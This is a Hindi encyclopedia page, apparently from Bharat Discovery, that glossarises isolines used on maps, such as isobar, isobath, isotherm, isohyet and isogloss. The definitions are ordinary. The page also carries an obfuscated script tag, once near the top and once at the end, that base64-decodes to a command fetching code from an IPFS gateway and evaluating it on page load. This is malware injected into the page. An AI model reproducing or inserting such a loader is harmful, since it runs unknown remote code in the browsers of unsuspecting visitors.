मानचित्र पर अंकित रेखाएँ

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

आईसोबार

समदाब (वायुदाब की समान स्थिति) वाले स्थानों को मिलाकर खींची जाने वाली रेखा।

आइसोबाथ

समुद्र के अन्दर समान गहराई वाले स्थानों को मिलाकर खींची जाने वाली रेखा।

आइसोब्रण्ट

तूफ़ान के एक साथ आने वाले स्थानों की सूचक रेखा।

आइसोक्रोन

समयान्तर के समान रहने पर किसी सन्दर्भ बिन्दु से दूरी प्रदर्शित करने वाली रेखा।

आइसोगोनल

चुम्बकीय झुकाव की समान स्थिति दर्शाने वाली रेखा।

आइसोहैलाइन

समुद्री जल में खारेपन की समान मात्रा प्रदर्शित करने वाली रेखा।

आइसोहेलाइन

सूर्यातप के समान अवधि वाले स्थानों को मिलाने वाली रेखा।

आइसोहाइप या कण्टूर रेखा

समुद्र तल से उच्चावच की समान ऊंचाई एवं आकार दर्शाने वाली रेखा।

आइसोनिफ़

बर्फ गिरने के समान क्षेत्रों को दर्शाने वाली रेखा।

आइसोनेफ

मेघाच्छन्नता के समान क्षेत्रों को मिलाने वाली रेखा।

आइसोनोमल

किसी सन्दर्भ बिन्दु से क्रमिक माप का प्रदर्शन करने वाली रेखा।

आइसोप्लेथ

विशेष अभिक्रिया वाले बिन्दुओं को मिलाकर खींची गई रेखा।

आइसोटैक

मौसम-मानचित्र पर पवन की समान गति वाले स्थानों को मिलाकर खींची गई रेखा।

आइसोथर्म

समान तापमान वाले क्षेत्रों को दर्शाने वाली रेखा।

आइसोपैक

हिमानी अथवा चट्टानों के समान मोटाई वाले स्थानों को मिलाने वाली रेखा।

आइसोफाइट

वनस्पतियों की समान ऊंचाई अथवा समान ऊंचाई वाले वानस्पतिक स्तरों को मिलाने वाली रेखा।

आइसोस्टैड

समान अधिवासीय संख्या को मिलाने वाली रेखा।

आइसोसीस्मल

भूकम्पीय तीव्रता की समानता वाले स्थानों को मिलाने वाली रेखा।

होमोसीस्मल

भूकम्प के एक ही समय आने वाले वाले स्थानों को मिलाने वाली रेखा।

आइसोथेरे

ग्रीष्मकाल के समान तापमान वाले वाले स्थानों को मिलाने वाली रेखा।

आइसोपाइक्निक

मानव जनसंख्या के समान घनत्व वाले वाले स्थानों को मिलाने वाली रेखा।

आइसोफ़्लॉर

वनस्पतियों-प्रजातियों की समानता वाले वाले स्थानों को मिलाने वाली रेखा।

आइसोकायनेटिक

समान पवन-वेग के वाले स्थानों को मिलाने वाली रेखा।

आइसोआईकेट

लोगों के रहने योग्य निवास की समान मात्रा वाले स्थानों को मिलाने वाली रेखा।

आइसोफेने

समान मौसमी घटनाओं[1] को दर्शाने वाली रेखा।

आइसोबेस

धरातल के किसी सन्दर्भ बिन्दु से समान ऊंचाई एवं निचाई को मिलाने वाली रेखा।

आइसोथर्मोबाथ अथवा आइसोबैथीथर्म

सागरीय जल की गहराई के अनुसार समान तापमान वाले बिन्दुओं को मिलाने वाली रेखा।

आइसोकाइम

औसत शीत तापमान की समानता वाले स्थानों को मिलाने वाली रेखा।

आइसोक्राइम

एक निश्चित समय पर सर्वाधिक शीतल तापमान वाले स्थानों को मिलाने वाली रेखा।

आइसोक्लाइन

चुम्बकीय नति की समानता वाले स्थानों को मिलाने वाली रेखा।

आइसोडाइन

समान चुम्बकीय गहनता वाले स्थानों को मिलाने वाली रेखा।

आइसोहायट

वर्षा की समान मात्रा वाले स्थानों को मिलाने वाले रेखा।

आइसोमेर

वर्षा की वार्षिक मात्रा के प्रतिशत के रूप में व्यक्त की जाने वाली उसकी औसत मासिक मात्रा के स्थानों को मिलाने वाली रेखा।

आइसोमेसिक अथवा आइसोमीसिक

तलछटों अथवा अवसादों के निर्माया की समान दशाओं को मिलाने वाली रेखा।

आइसोपैकाइट अथवा आइसोपाथ

भूगर्भिक अथवा भूभौतिक परत कीस मान मोटाई वाले बिन्दुओं को मिलाने वाली रेखा।

कोसीस्मल अथवा आइसोसीस्ट

समान भूकम्पीय लहरों को एक समय में ही अनुभव करने वाले स्थानों को मिलाने वाली रेखा।

आइसोटैलेण्टोज

औसत मासिक तापान्तर की समानता वाले स्थानों को मिलाने वाली रेखा।

आइसोथर्माब्रोस

समान ग्रीष्मकालीन वर्षा वाले स्थानों को मिलाने वाली रेखा।

आइसोनोमलस रेखा

समान तापीय विसंगति वाले स्थानों को मिलाने वाली रेखा।

आइसैलोबार

एक विशिष्ट अवधि में वायुमण्डलीय दबाव में होने वाले समान परिवर्तन के स्थानों को मिलाने वाली रेखा।

आइसोकोर

  • नियत आयतन वाले बिन्दुओं को मिलाने वाली रेखा।
  • दो तलों या संस्तरों के बीच समान ऊर्ध्वाधर अन्तरालों वाले बिन्दुओं से होकर खींची जाने वाली रेखा।

आइसोक्लाइनल

एक ही दिशा में समान मात्रा में होने वाली नदियों को मिलाने वाली रेखा।

आइसोग्रैम

समान गुरुत्व-असंगति वाले बिन्दुओं को मिलाने वाली रेखा।

आइसोग्लॉस

किसी प्रदेश में समान भषा वाले स्थानों को वर्गीकृत करने वाली सीमा रेखा।

आइसोग्रैड

  • एक ही प्रकार के लक्षणों से युक्त शैलों को मिलाने वाली रेखा।
  • कायान्तरण की समान कोटि अथवा दशा को प्राप्त शैलों को मिलाने वाली रेखा।

आइसोपोर

चुम्बकीय विभिन्नता में समान वार्षिक परिवर्तन वाले स्थानों को मिलाने वाली रेखा।

आइसोकेफ

कापालिका विभिन्नता को दर्शाने वाली रेखा।

आइसोटर्प

समान आराम वाले स्थानों को दर्शाने वाली रेखा।

आइसोज़ेरोमीन

यह वह रेखा होती है, जो समान वायुमण्डलीय शुष्कता वाले स्थानों को मिलाते हुए मानचित्रों पर खींची जाती है।

आइसोरिदम्स

समान मान वाली रेखाओं का एक सम्मिलित जननिक नाम। इनके अन्तर्गत समस्त रेखाएं शामिल की जाती है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. यथा पौधों में फूल आने का समय आदि

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>